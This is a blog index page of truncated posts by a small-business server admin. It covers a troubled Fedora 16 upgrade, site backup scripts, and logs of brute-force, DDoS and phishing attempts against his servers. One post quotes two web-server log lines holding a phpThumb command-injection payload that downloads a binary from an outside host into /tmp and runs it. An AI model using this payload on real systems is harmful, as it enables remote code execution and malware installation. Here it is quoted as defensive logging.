happycattech.com One Year Aniversary - Gnome 3 Fedora 16 Update

Member for

6 months 4 weeks
Submitted by AlReaud on Thu, 05/24/2012 - 22:53

The website's first year rolls around, and looking back it was interesting. Most of the hacking disappeared over time, with just occassional attacks occurring on the testing server. Recently, there have been more shell attacks coming from the US itself, treated in the same manner as usual. Business is slow, and the only work recently has been mostly hooking up with Manuel Labor.

Gnome 3 / Fedora 16 still isn't satisfactory, but it has improved. I've learned not to log out, but to just close all applications and lock the screen. That seems to prevent the hard lockups that happen on logout. Well, at least I haven't tried recently. I've had no success with restarting the Gnome Shell via remote command shell when hard lockups occur. The problem isn't (usually) in the kernel, but in Gnome Shell.

There is also an interesting video quirk which appears to scramble the screen tiles. Both on the background and in the application windows. It not a memory

Fedora 14 Upgrade to Fedora 16 and GNOME 3: Not for the faint hearted...

Member for

6 months 4 weeks
Submitted by AlReaud on Sun, 02/26/2012 - 20:21

After waiting until Fedora 14 end of life to occur, I upgraded all systems to Fedora 16 except for one that had insufficient memory. Though the documentation says 768M, you should have at least one GB of ram and three times that in swap. It is important to note, before you start, that the upgrade process works better from a root shell than from the X-Windows GUI. Editing inittab may be required to allow this.

The first thing you want to do with this upgrade is, obviously, back up any critical data onto a machine that you can still operate with, such as a laptop or onto non-volatile media such as good quality DVDs. However, if you don't have another computer, I would recommend that you do an extra dose of your medication of choice before you start. Next install grub2 via the command yum install grub2, if it isn't already installed. This will save your ass when the install doesn't start. Having grub2 will allow you to manually start the upgrade via the grub command line or fall back to the old kernel version if all else fails.

Next we need to install preupgrade via the command yum install preupgrade. Now before starting, insure that you back up everything that you hold dear. That includes pictures, records, videos, anything that you can't afford to loose. Some things may not work as expected or may not work at all after the upgrade.

The next command that

Backing up the whole site

Member for

6 months 4 weeks
Submitted by AlReaud on Wed, 01/18/2012 - 20:52

Revised: 2016-09-03, Al Reaud, Happy Cat Technologies

The following script integrates backing up the database with backing up the site code. Please note that descriptions place-hold for actual values in the script. Those actual values must be edited in, depending on your site configuration, for the script to work.

This script is adapted from the updated fullsitebackup.sh script created by Bristolguy on Drupal.org. This script is currently operational on Ubuntu 16.04, and has not been tested on other versions of Linux.

The shell script is available here for your convenience, demo.full_site_backup.sh.txt.

full_site_backup.sh

Backing up the CMS Database

Member for

6 months 4 weeks
Submitted by AlReaud on Wed, 01/18/2012 - 19:51

Revised: 2016-09-12, Al Reaud, Happy Cat Technologies

The CMS database is the heart of any content management system. It's loss or damage will result in the loss and or damage of all of your hard work, and that of your commentators, posters, and contributors. Below, are two scripts that complement each other, one backs up the database into a SQL file, the other restores it from a SQL file.

Very Quiet on the Server Front

Member for

6 months 4 weeks
Submitted by AlReaud on Tue, 01/10/2012 - 22:21

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute forcing the root, some brute forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute forcing. Majority of attacks last week from CN, then US.

The activity has changed to the on-line servers, where I occasionally get DOS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DOS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

Disecting a Spoof Craigs List Email

Member for

6 months 4 weeks
Submitted by AlReaud on Tue, 12/27/2011 - 09:29

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NO ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigs List phishing email attempting to get your login.

The most important above is that when you hover over the link, you can see in the status bar

Punishment DDOS attacks on online server

Member for

6 months 4 weeks
Submitted by AlReaud on Sat, 12/24/2011 - 08:16

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDOS attacks started in the late evening, starting probably around 21:00 through at least probably midnight. Can't actually tell because I can't access the httpd logs. The positive note is this lead to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allow access to the server logs, but Yahoo did not when I used them. It's a virtual machine so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR, I know the bot-net there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area,

Rise of the Machine. A week of wetware against bots...

Member for

6 months 4 weeks
Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL. cheeky

One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

 161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20
-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;c
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]
=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses,

Persistent attacks from one IP in India

Member for

6 months 4 weeks
Submitted by AlReaud on Mon, 12/12/2011 - 08:10

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead on the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low level weaknesses,  with a server running at port 631. The interpretation of that is that the hacking is intentional, because without weakness present, it somewhat eliminates unintentional bots, as with the Church last week. Most of the systems examined so far have certain weaknesses present, such as http TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their